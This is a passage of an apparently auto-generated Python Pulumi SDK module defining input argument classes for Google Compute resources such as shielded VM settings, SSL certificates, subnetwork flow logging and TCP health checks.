def connection_limit(self) -> Optional[pulumi.Input[int]]:
"""
The value of the limit to set.
"""
return pulumi.get(self, "connection_limit")
@connection_limit.setter
def connection_limit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "connection_limit", value)
@property
@pulumi.getter(name="projectIdOrNum")
def project_id_or_num(self) -> Optional[pulumi.Input[str]]:
"""
The project id or number for the project to set the limit for.
"""
return pulumi.get(self, "project_id_or_num")
@project_id_or_num.setter
def project_id_or_num(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id_or_num", value)
@pulumi.input_type
class ShareSettingsArgs:
def __init__(__self__, *,
project_map: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
projects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
share_type: Optional[pulumi.Input['ShareSettingsShareType']] = None):
"""
The share setting for reservations and sole tenancy node groups.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] project_map: A map of project id and project config. This is only valid when share_type's value is SPECIFIC_PROJECTS.
:param pulumi.Input[Sequence[pulumi.Input[str]]] projects: A List of Project names to specify consumer projects for this shared-reservation. This is only valid when share_type's value is SPECIFIC_PROJECTS.
:param pulumi.Input['ShareSettingsShareType'] share_type: Type of sharing for this shared-reservation
"""
if project_map is not None:
pulumi.set(__self__, "project_map", project_map)
if projects is not None:
pulumi.set(__self__, "projects", projects)
if share_type is not None:
pulumi.set(__self__, "share_type", share_type)
@property
@pulumi.getter(name="projectMap")
def project_map(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of project id and project config. This is only valid when share_type's value is SPECIFIC_PROJECTS.
"""
return pulumi.get(self, "project_map")
@project_map.setter
def project_map(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "project_map", value)
@property
@pulumi.getter
def projects(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A List of Project names to specify consumer projects for this shared-reservation. This is only valid when share_type's value is SPECIFIC_PROJECTS.
"""
return pulumi.get(self, "projects")
@projects.setter
def projects(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "projects", value)
@property
@pulumi.getter(name="shareType")
def share_type(self) -> Optional[pulumi.Input['ShareSettingsShareType']]:
"""
Type of sharing for this shared-reservation
"""
return pulumi.get(self, "share_type")
@share_type.setter
def share_type(self, value: Optional[pulumi.Input['ShareSettingsShareType']]):
pulumi.set(self, "share_type", value)
@pulumi.input_type
class ShieldedInstanceConfigArgs:
def __init__(__self__, *,
enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,
enable_secure_boot: Optional[pulumi.Input[bool]] = None,
enable_vtpm: Optional[pulumi.Input[bool]] = None):
"""
A set of Shielded Instance options.
:param pulumi.Input[bool] enable_integrity_monitoring: Defines whether the instance has integrity monitoring enabled. Enabled by default.
:param pulumi.Input[bool] enable_secure_boot: Defines whether the instance has Secure Boot enabled. Disabled by default.
:param pulumi.Input[bool] enable_vtpm: Defines whether the instance has the vTPM enabled. Enabled by default.
"""
if enable_integrity_monitoring is not None:
pulumi.set(__self__, "enable_integrity_monitoring", enable_integrity_monitoring)
if enable_secure_boot is not None:
pulumi.set(__self__, "enable_secure_boot", enable_secure_boot)
if enable_vtpm is not None:
pulumi.set(__self__, "enable_vtpm", enable_vtpm)
@property
@pulumi.getter(name="enableIntegrityMonitoring")
def enable_integrity_monitoring(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has integrity monitoring enabled. Enabled by default.
"""
return pulumi.get(self, "enable_integrity_monitoring")
@enable_integrity_monitoring.setter
def enable_integrity_monitoring(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_integrity_monitoring", value)
@property
@pulumi.getter(name="enableSecureBoot")
def enable_secure_boot(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has Secure Boot enabled. Disabled by default.
"""
return pulumi.get(self, "enable_secure_boot")
@enable_secure_boot.setter
def enable_secure_boot(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_secure_boot", value)
@property
@pulumi.getter(name="enableVtpm")
def enable_vtpm(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has the vTPM enabled. Enabled by default.
"""
return pulumi.get(self, "enable_vtpm")
@enable_vtpm.setter
def enable_vtpm(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_vtpm", value)
@pulumi.input_type
class ShieldedInstanceIntegrityPolicyArgs:
def __init__(__self__, *,
update_auto_learn_policy: Optional[pulumi.Input[bool]] = None):
"""
The policy describes the baseline against which Instance boot integrity is measured.
:param pulumi.Input[bool] update_auto_learn_policy: Updates the integrity policy baseline using the measurements from the VM instance's most recent boot.
"""
if update_auto_learn_policy is not None:
pulumi.set(__self__, "update_auto_learn_policy", update_auto_learn_policy)
@property
@pulumi.getter(name="updateAutoLearnPolicy")
def update_auto_learn_policy(self) -> Optional[pulumi.Input[bool]]:
"""
Updates the integrity policy baseline using the measurements from the VM instance's most recent boot.
"""
return pulumi.get(self, "update_auto_learn_policy")
@update_auto_learn_policy.setter
def update_auto_learn_policy(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "update_auto_learn_policy", value)
@pulumi.input_type
class ShieldedVmConfigArgs:
def __init__(__self__, *,
enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,
enable_secure_boot: Optional[pulumi.Input[bool]] = None,
enable_vtpm: Optional[pulumi.Input[bool]] = None):
"""
A set of Shielded VM options.
:param pulumi.Input[bool] enable_integrity_monitoring: Defines whether the instance has integrity monitoring enabled.
:param pulumi.Input[bool] enable_secure_boot: Defines whether the instance has Secure Boot enabled.
:param pulumi.Input[bool] enable_vtpm: Defines whether the instance has the vTPM enabled.
"""
if enable_integrity_monitoring is not None:
pulumi.set(__self__, "enable_integrity_monitoring", enable_integrity_monitoring)
if enable_secure_boot is not None:
pulumi.set(__self__, "enable_secure_boot", enable_secure_boot)
if enable_vtpm is not None:
pulumi.set(__self__, "enable_vtpm", enable_vtpm)
@property
@pulumi.getter(name="enableIntegrityMonitoring")
def enable_integrity_monitoring(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has integrity monitoring enabled.
"""
return pulumi.get(self, "enable_integrity_monitoring")
@enable_integrity_monitoring.setter
def enable_integrity_monitoring(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_integrity_monitoring", value)
@property
@pulumi.getter(name="enableSecureBoot")
def enable_secure_boot(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has Secure Boot enabled.
"""
return pulumi.get(self, "enable_secure_boot")
@enable_secure_boot.setter
def enable_secure_boot(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_secure_boot", value)
@property
@pulumi.getter(name="enableVtpm")
def enable_vtpm(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has the vTPM enabled.
"""
return pulumi.get(self, "enable_vtpm")
@enable_vtpm.setter
def enable_vtpm(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_vtpm", value)
@pulumi.input_type
class ShieldedVmIntegrityPolicyArgs:
def __init__(__self__, *,
update_auto_learn_policy: Optional[pulumi.Input[bool]] = None):
"""
The policy describes the baseline against which VM instance boot integrity is measured.
:param pulumi.Input[bool] update_auto_learn_policy: Updates the integrity policy baseline using the measurements from the VM instance's most recent boot.
"""
if update_auto_learn_policy is not None:
pulumi.set(__self__, "update_auto_learn_policy", update_auto_learn_policy)
@property
@pulumi.getter(name="updateAutoLearnPolicy")
def update_auto_learn_policy(self) -> Optional[pulumi.Input[bool]]:
"""
Updates the integrity policy baseline using the measurements from the VM instance's most recent boot.
"""
return pulumi.get(self, "update_auto_learn_policy")
@update_auto_learn_policy.setter
def update_auto_learn_policy(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "update_auto_learn_policy", value)
@pulumi.input_type
class SourceDiskEncryptionKeyArgs:
def __init__(__self__, *,
disk_encryption_key: Optional[pulumi.Input['CustomerEncryptionKeyArgs']] = None,
source_disk: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input['CustomerEncryptionKeyArgs'] disk_encryption_key: The customer-supplied encryption key of the source disk. Required if the source disk is protected by a customer-supplied encryption key.
:param pulumi.Input[str] source_disk: URL of the disk attached to the source instance. This can be a full or valid partial URL. For example, the following are valid values: - https://www.googleapis.com/compute/v1/projects/project/zones/zone /disks/disk - projects/project/zones/zone/disks/disk - zones/zone/disks/disk
"""
if disk_encryption_key is not None:
pulumi.set(__self__, "disk_encryption_key", disk_encryption_key)
if source_disk is not None:
pulumi.set(__self__, "source_disk", source_disk)
@property
@pulumi.getter(name="diskEncryptionKey")
def disk_encryption_key(self) -> Optional[pulumi.Input['CustomerEncryptionKeyArgs']]:
"""
The customer-supplied encryption key of the source disk. Required if the source disk is protected by a customer-supplied encryption key.
"""
return pulumi.get(self, "disk_encryption_key")
@disk_encryption_key.setter
def disk_encryption_key(self, value: Optional[pulumi.Input['CustomerEncryptionKeyArgs']]):
pulumi.set(self, "disk_encryption_key", value)
@property
@pulumi.getter(name="sourceDisk")
def source_disk(self) -> Optional[pulumi.Input[str]]:
"""
URL of the disk attached to the source instance. This can be a full or valid partial URL. For example, the following are valid values: - https://www.googleapis.com/compute/v1/projects/project/zones/zone /disks/disk - projects/project/zones/zone/disks/disk - zones/zone/disks/disk
"""
return pulumi.get(self, "source_disk")
@source_disk.setter
def source_disk(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_disk", value)
@pulumi.input_type
class SourceInstanceParamsArgs:
def __init__(__self__, *,
disk_configs: Optional[pulumi.Input[Sequence[pulumi.Input['DiskInstantiationConfigArgs']]]] = None):
"""
A specification of the parameters to use when creating the instance template from a source instance.
:param pulumi.Input[Sequence[pulumi.Input['DiskInstantiationConfigArgs']]] disk_configs: Attached disks configuration. If not provided, defaults are applied: For boot disk and any other R/W disks, new custom images will be created from each disk. For read-only disks, they will be attached in read-only mode. Local SSD disks will be created as blank volumes.
"""
if disk_configs is not None:
pulumi.set(__self__, "disk_configs", disk_configs)
@property
@pulumi.getter(name="diskConfigs")
def disk_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DiskInstantiationConfigArgs']]]]:
"""
Attached disks configuration. If not provided, defaults are applied: For boot disk and any other R/W disks, new custom images will be created from each disk. For read-only disks, they will be attached in read-only mode. Local SSD disks will be created as blank volumes.
"""
return pulumi.get(self, "disk_configs")
@disk_configs.setter
def disk_configs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DiskInstantiationConfigArgs']]]]):
pulumi.set(self, "disk_configs", value)
@pulumi.input_type
class SslCertificateManagedSslCertificateArgs:
def __init__(__self__, *,
domains: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Configuration and status of a managed SSL certificate.
:param pulumi.Input[Sequence[pulumi.Input[str]]] domains: The domains for which a managed SSL certificate will be generated. Each Google-managed SSL certificate supports up to the [maximum number of domains per Google-managed SSL certificate](/load-balancing/docs/quotas#ssl_certificates).
"""
if domains is not None:
pulumi.set(__self__, "domains", domains)
@property
@pulumi.getter
def domains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The domains for which a managed SSL certificate will be generated. Each Google-managed SSL certificate supports up to the [maximum number of domains per Google-managed SSL certificate](/load-balancing/docs/quotas#ssl_certificates).
"""
return pulumi.get(self, "domains")
@domains.setter
def domains(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "domains", value)
@pulumi.input_type
class SslCertificateSelfManagedSslCertificateArgs:
def __init__(__self__, *,
certificate: Optional[pulumi.Input[str]] = None,
private_key: Optional[pulumi.Input[str]] = None):
"""
Configuration and status of a self-managed SSL certificate.
:param pulumi.Input[str] certificate: A local certificate file. The certificate must be in PEM format. The certificate chain must be no greater than 5 certs long. The chain must include at least one intermediate cert.
:param pulumi.Input[str] private_key: A write-only private key in PEM format. Only insert requests will include this field.
"""
if certificate is not None:
pulumi.set(__self__, "certificate", certificate)
if private_key is not None:
pulumi.set(__self__, "private_key", private_key)
@property
@pulumi.getter
def certificate(self) -> Optional[pulumi.Input[str]]:
"""
A local certificate file. The certificate must be in PEM format. The certificate chain must be no greater than 5 certs long. The chain must include at least one intermediate cert.
"""
return pulumi.get(self, "certificate")
@certificate.setter
def certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "certificate", value)
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> Optional[pulumi.Input[str]]:
"""
A write-only private key in PEM format. Only insert requests will include this field.
"""
return pulumi.get(self, "private_key")
@private_key.setter
def private_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_key", value)
@pulumi.input_type
class StatefulPolicyPreservedStateArgs:
def __init__(__self__, *,
disks: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
external_ips: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
internal_ips: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Configuration of preserved resources.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] disks: Disks created on the instances that will be preserved on instance delete, update, etc. This map is keyed with the device names of the disks.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] external_ips: External network IPs assigned to the instances that will be preserved on instance delete, update, etc. This map is keyed with the network interface name.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] internal_ips: Internal network IPs assigned to the instances that will be preserved on instance delete, update, etc. This map is keyed with the network interface name.
"""
if disks is not None:
pulumi.set(__self__, "disks", disks)
if external_ips is not None:
pulumi.set(__self__, "external_ips", external_ips)
if internal_ips is not None:
pulumi.set(__self__, "internal_ips", internal_ips)
@property
@pulumi.getter
def disks(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Disks created on the instances that will be preserved on instance delete, update, etc. This map is keyed with the device names of the disks.
"""
return pulumi.get(self, "disks")
@disks.setter
def disks(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "disks", value)
@property
@pulumi.getter(name="externalIPs")
def external_ips(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
External network IPs assigned to the instances that will be preserved on instance delete, update, etc. This map is keyed with the network interface name.
"""
return pulumi.get(self, "external_ips")
@external_ips.setter
def external_ips(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "external_ips", value)
@property
@pulumi.getter(name="internalIPs")
def internal_ips(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Internal network IPs assigned to the instances that will be preserved on instance delete, update, etc. This map is keyed with the network interface name.
"""
return pulumi.get(self, "internal_ips")
@internal_ips.setter
def internal_ips(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "internal_ips", value)
@pulumi.input_type
class StatefulPolicyArgs:
def __init__(__self__, *,
preserved_state: Optional[pulumi.Input['StatefulPolicyPreservedStateArgs']] = None):
if preserved_state is not None:
pulumi.set(__self__, "preserved_state", preserved_state)
@property
@pulumi.getter(name="preservedState")
def preserved_state(self) -> Optional[pulumi.Input['StatefulPolicyPreservedStateArgs']]:
return pulumi.get(self, "preserved_state")
@preserved_state.setter
def preserved_state(self, value: Optional[pulumi.Input['StatefulPolicyPreservedStateArgs']]):
pulumi.set(self, "preserved_state", value)
@pulumi.input_type
class SubnetworkLogConfigArgs:
def __init__(__self__, *,
aggregation_interval: Optional[pulumi.Input['SubnetworkLogConfigAggregationInterval']] = None,
enable: Optional[pulumi.Input[bool]] = None,
filter_expr: Optional[pulumi.Input[str]] = None,
flow_sampling: Optional[pulumi.Input[float]] = None,
metadata: Optional[pulumi.Input['SubnetworkLogConfigMetadata']] = None,
metadata_fields: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The available logging options for this subnetwork.
:param pulumi.Input['SubnetworkLogConfigAggregationInterval'] aggregation_interval: Can only be specified if VPC flow logging for this subnetwork is enabled. Toggles the aggregation interval for collecting flow logs. Increasing the interval time will reduce the amount of generated flow logs for long lasting connections. Default is an interval of 5 seconds per connection.
:param pulumi.Input[bool] enable: Whether to enable flow logging for this subnetwork. If this field is not explicitly set, it will not appear in get listings. If not set the default behavior is determined by the org policy, if there is no org policy specified, then it will default to disabled.
:param pulumi.Input[str] filter_expr: Can only be specified if VPC flow logs for this subnetwork is enabled. Export filter used to define which VPC flow logs should be logged.
:param pulumi.Input[float] flow_sampling: Can only be specified if VPC flow logging for this subnetwork is enabled. The value of the field must be in [0, 1]. Set the sampling rate of VPC flow logs within the subnetwork where 1.0 means all collected logs are reported and 0.0 means no logs are reported. Default is 0.5 unless otherwise specified by the org policy, which means half of all collected logs are reported.
:param pulumi.Input['SubnetworkLogConfigMetadata'] metadata: Can only be specified if VPC flow logs for this subnetwork is enabled. Configures whether all, none or a subset of metadata fields should be added to the reported VPC flow logs. Default is EXCLUDE_ALL_METADATA.
:param pulumi.Input[Sequence[pulumi.Input[str]]] metadata_fields: Can only be specified if VPC flow logs for this subnetwork is enabled and "metadata" was set to CUSTOM_METADATA.
"""
if aggregation_interval is not None:
pulumi.set(__self__, "aggregation_interval", aggregation_interval)
if enable is not None:
pulumi.set(__self__, "enable", enable)
if filter_expr is not None:
pulumi.set(__self__, "filter_expr", filter_expr)
if flow_sampling is not None:
pulumi.set(__self__, "flow_sampling", flow_sampling)
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
if metadata_fields is not None:
pulumi.set(__self__, "metadata_fields", metadata_fields)
@property
@pulumi.getter(name="aggregationInterval")
def aggregation_interval(self) -> Optional[pulumi.Input['SubnetworkLogConfigAggregationInterval']]:
"""
Can only be specified if VPC flow logging for this subnetwork is enabled. Toggles the aggregation interval for collecting flow logs. Increasing the interval time will reduce the amount of generated flow logs for long lasting connections. Default is an interval of 5 seconds per connection.
"""
return pulumi.get(self, "aggregation_interval")
@aggregation_interval.setter
def aggregation_interval(self, value: Optional[pulumi.Input['SubnetworkLogConfigAggregationInterval']]):
pulumi.set(self, "aggregation_interval", value)
@property
@pulumi.getter
def enable(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable flow logging for this subnetwork. If this field is not explicitly set, it will not appear in get listings. If not set the default behavior is determined by the org policy, if there is no org policy specified, then it will default to disabled.
"""
return pulumi.get(self, "enable")
@enable.setter
def enable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable", value)
@property
@pulumi.getter(name="filterExpr")
def filter_expr(self) -> Optional[pulumi.Input[str]]:
"""
Can only be specified if VPC flow logs for this subnetwork is enabled. Export filter used to define which VPC flow logs should be logged.
"""
return pulumi.get(self, "filter_expr")
@filter_expr.setter
def filter_expr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_expr", value)
@property
@pulumi.getter(name="flowSampling")
def flow_sampling(self) -> Optional[pulumi.Input[float]]:
"""
Can only be specified if VPC flow logging for this subnetwork is enabled. The value of the field must be in [0, 1]. Set the sampling rate of VPC flow logs within the subnetwork where 1.0 means all collected logs are reported and 0.0 means no logs are reported. Default is 0.5 unless otherwise specified by the org policy, which means half of all collected logs are reported.
"""
return pulumi.get(self, "flow_sampling")
@flow_sampling.setter
def flow_sampling(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "flow_sampling", value)
@property
@pulumi.getter
def metadata(self) -> Optional[pulumi.Input['SubnetworkLogConfigMetadata']]:
"""
Can only be specified if VPC flow logs for this subnetwork is enabled. Configures whether all, none or a subset of metadata fields should be added to the reported VPC flow logs. Default is EXCLUDE_ALL_METADATA.
"""
return pulumi.get(self, "metadata")
@metadata.setter
def metadata(self, value: Optional[pulumi.Input['SubnetworkLogConfigMetadata']]):
pulumi.set(self, "metadata", value)
@property
@pulumi.getter(name="metadataFields")
def metadata_fields(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Can only be specified if VPC flow logs for this subnetwork is enabled and "metadata" was set to CUSTOM_METADATA.
"""
return pulumi.get(self, "metadata_fields")
@metadata_fields.setter
def metadata_fields(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "metadata_fields", value)
@pulumi.input_type
class SubnetworkSecondaryRangeArgs:
def __init__(__self__, *,
ip_cidr_range: Optional[pulumi.Input[str]] = None,
range_name: Optional[pulumi.Input[str]] = None):
"""
Represents a secondary IP range of a subnetwork.
:param pulumi.Input[str] ip_cidr_range: The range of IP addresses belonging to this subnetwork secondary range. Provide this property when you create the subnetwork. Ranges must be unique and non-overlapping with all primary and secondary IP ranges within a network. Only IPv4 is supported. The range can be any range listed in the Valid ranges list.
:param pulumi.Input[str] range_name: The name associated with this subnetwork secondary range, used when adding an alias IP range to a VM instance. The name must be 1-63 characters long, and comply with RFC1035. The name must be unique within the subnetwork.
"""
if ip_cidr_range is not None:
pulumi.set(__self__, "ip_cidr_range", ip_cidr_range)
if range_name is not None:
pulumi.set(__self__, "range_name", range_name)
@property
@pulumi.getter(name="ipCidrRange")
def ip_cidr_range(self) -> Optional[pulumi.Input[str]]:
"""
The range of IP addresses belonging to this subnetwork secondary range. Provide this property when you create the subnetwork. Ranges must be unique and non-overlapping with all primary and secondary IP ranges within a network. Only IPv4 is supported. The range can be any range listed in the Valid ranges list.
"""
return pulumi.get(self, "ip_cidr_range")
@ip_cidr_range.setter
def ip_cidr_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_cidr_range", value)
@property
@pulumi.getter(name="rangeName")
def range_name(self) -> Optional[pulumi.Input[str]]:
"""
The name associated with this subnetwork secondary range, used when adding an alias IP range to a VM instance. The name must be 1-63 characters long, and comply with RFC1035. The name must be unique within the subnetwork.
"""
return pulumi.get(self, "range_name")
@range_name.setter
def range_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "range_name", value)
@pulumi.input_type
class SubsettingArgs:
def __init__(__self__, *,
policy: Optional[pulumi.Input['SubsettingPolicy']] = None,
subset_size: Optional[pulumi.Input[int]] = None):
"""
Subsetting configuration for this BackendService. Currently this is applicable only for Internal TCP/UDP load balancing, Internal HTTP(S) load balancing and Traffic Director.
:param pulumi.Input[int] subset_size: The number of backends per backend group assigned to each proxy instance or each service mesh client. An input parameter to the `CONSISTENT_HASH_SUBSETTING` algorithm. Can only be set if `policy` is set to `CONSISTENT_HASH_SUBSETTING`. Can only be set if load balancing scheme is `INTERNAL_MANAGED` or `INTERNAL_SELF_MANAGED`. `subset_size` is optional for Internal HTTP(S) load balancing and required for Traffic Director. If you do not provide this value, Cloud Load Balancing will calculate it dynamically to optimize the number of proxies/clients visible to each backend and vice versa. Must be greater than 0. If `subset_size` is larger than the number of backends/endpoints, then subsetting is disabled.
"""
if policy is not None:
pulumi.set(__self__, "policy", policy)
if subset_size is not None:
pulumi.set(__self__, "subset_size", subset_size)
@property
@pulumi.getter
def policy(self) -> Optional[pulumi.Input['SubsettingPolicy']]:
return pulumi.get(self, "policy")
@policy.setter
def policy(self, value: Optional[pulumi.Input['SubsettingPolicy']]):
pulumi.set(self, "policy", value)
@property
@pulumi.getter(name="subsetSize")
def subset_size(self) -> Optional[pulumi.Input[int]]:
"""
The number of backends per backend group assigned to each proxy instance or each service mesh client. An input parameter to the `CONSISTENT_HASH_SUBSETTING` algorithm. Can only be set if `policy` is set to `CONSISTENT_HASH_SUBSETTING`. Can only be set if load balancing scheme is `INTERNAL_MANAGED` or `INTERNAL_SELF_MANAGED`. `subset_size` is optional for Internal HTTP(S) load balancing and required for Traffic Director. If you do not provide this value, Cloud Load Balancing will calculate it dynamically to optimize the number of proxies/clients visible to each backend and vice versa. Must be greater than 0. If `subset_size` is larger than the number of backends/endpoints, then subsetting is disabled.
"""
return pulumi.get(self, "subset_size")
@subset_size.setter
def subset_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "subset_size", value)
@pulumi.input_type
class TCPHealthCheckArgs:
def __init__(__self__, *,
port: Optional[pulumi.Input[int]] = None,
port_name: Optional[pulumi.Input[str]] = None,
port_specification: Optional[pulumi.Input['TCPHealthCheckPortSpecification']] = None,
proxy_header: Optional[pulumi.Input['TCPHealthCheckProxyHeader']] = None,
request: Optional[pulumi.Input[str]] = None,
response: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] port: The TCP port number for the health check request. The default value is 80. Valid values are 1 through 65535.
:param pulumi.Input[str] port_name: Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence.
:param pulumi.Input['TCPHealthCheckPortSpecification'] port_specification: Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, TCP health check follows behavior specified in port and portName fields.
:param pulumi.Input['TCPHealthCheckProxyHeader'] proxy_header: Specifies the type of proxy header to append before sending data to the backend, either NONE or PROXY_V1. The default is NONE.
:param pulumi.Input[str] request: The application data to send once the TCP connection has been established (default value is empty). If both request and response are empty, the connection establishment alone will indicate health. The request data can only be ASCII.
:param pulumi.Input[str] response: The bytes to match against the beginning of the response data. If left empty (the default value), any response will indicate health. The response data can only be ASCII.
"""
if port is not None:
pulumi.set(__self__, "port", port)
if port_name is not None:
pulumi.set(__self__, "port_name", port_name)
if port_specification is not None:
pulumi.set(__self__, "port_specification", port_specification)
if proxy_header is not None:
pulumi.set(__self__, "proxy_header", proxy_header)
if request is not None:
pulumi.set(__self__, "request", request)
if response is not None:
pulumi.set(__self__, "response", response)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The TCP port number for the health check request. The default value is 80. Valid values are 1 through 65535.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="portName")
def port_name(self) -> Optional[pulumi.Input[str]]:
"""
Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence.
"""
return pulumi.get(self, "port_name")
@port_name.setter
def port_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port_name", value)
@property
@pulumi.getter(name="portSpecification")
def port_specification(self) -> Optional[pulumi.Input['TCPHealthCheckPortSpecification']]:
"""
Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, TCP health check follows behavior specified in port and portName fields.
"""
return pulumi.get(self, "port_specification")
@port_specification.setter
def port_specification(self, value: Optional[pulumi.Input['TCPHealthCheckPortSpecification']]):
pulumi.set(self, "port_specification", value)
@property
@pulumi.getter(name="proxyHeader")
def proxy_header(self) -> Optional[pulumi.Input['TCPHealthCheckProxyHeader']]:
"""
Specifies the type of proxy header to append before sending data to the backend, either NONE or PROXY_V1. The default is NONE.
"""
return pulumi.get(self, "proxy_header")
@proxy_header.setter
def proxy_header(self, value: Optional[pulumi.Input['TCPHealthCheckProxyHeader']]):
pulumi.set(self, "proxy_header", value)
@property
@pulumi.getter
def request(self) -> Optional[pulumi.Input[str]]:
"""
The application data to send once the TCP connection has been established (default value is empty). If both request and response are empty, the connection establishment alone will indicate health. The request data can only be ASCII.
"""
return pulumi.get(self, "request")
@request.setter
def request(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request", value)
@property
@pulumi.getter
def response(self) -> Optional[pulumi.Input[str]]:
"""
The bytes to match against the beginning of the response data. If left empty (the default value), any response will indicate health. The response data can only be ASCII.
"""
return pulumi.get(self, "response")
@response.setter
def response(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "response", value)
@pulumi.input_type
class TagsArgs:
def __init__(__self__, *,
items: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
A set of instance tags.
:param pulumi.Input[Sequence[pulumi.Input[str]]] items: An array of tags. Each tag must be 1-63 characters long, and comply with RFC1035.
"""
if items is not None:
pulumi.set(__self__, "items", items)
@property
@pulumi.getter
def items(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An array of tags. Each tag must be 1-63 characters long, and comply with RFC1035.
"""
return pulumi.get(self, "items")
@items.setter
def items(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "items", value)
@pulumi.input_type
class UrlMapTestHeaderArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
HTTP headers used in UrlMapTests.
:param pulumi.Input[str] name: Header name.
:param pulumi.Input[str] value: Header value.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Header name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
Header value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class UrlMapTestArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
expected_output_url: Optional[pulumi.Input[str]] = None,
expected_redirect_response_code: Optional[pulumi.Input[int]] = None,
headers: Optional[pulumi.Input[Sequence[pulumi.Input['UrlMapTestHeaderArgs']]]] = None,
host: Optional[pulumi.Input[str]] = None,
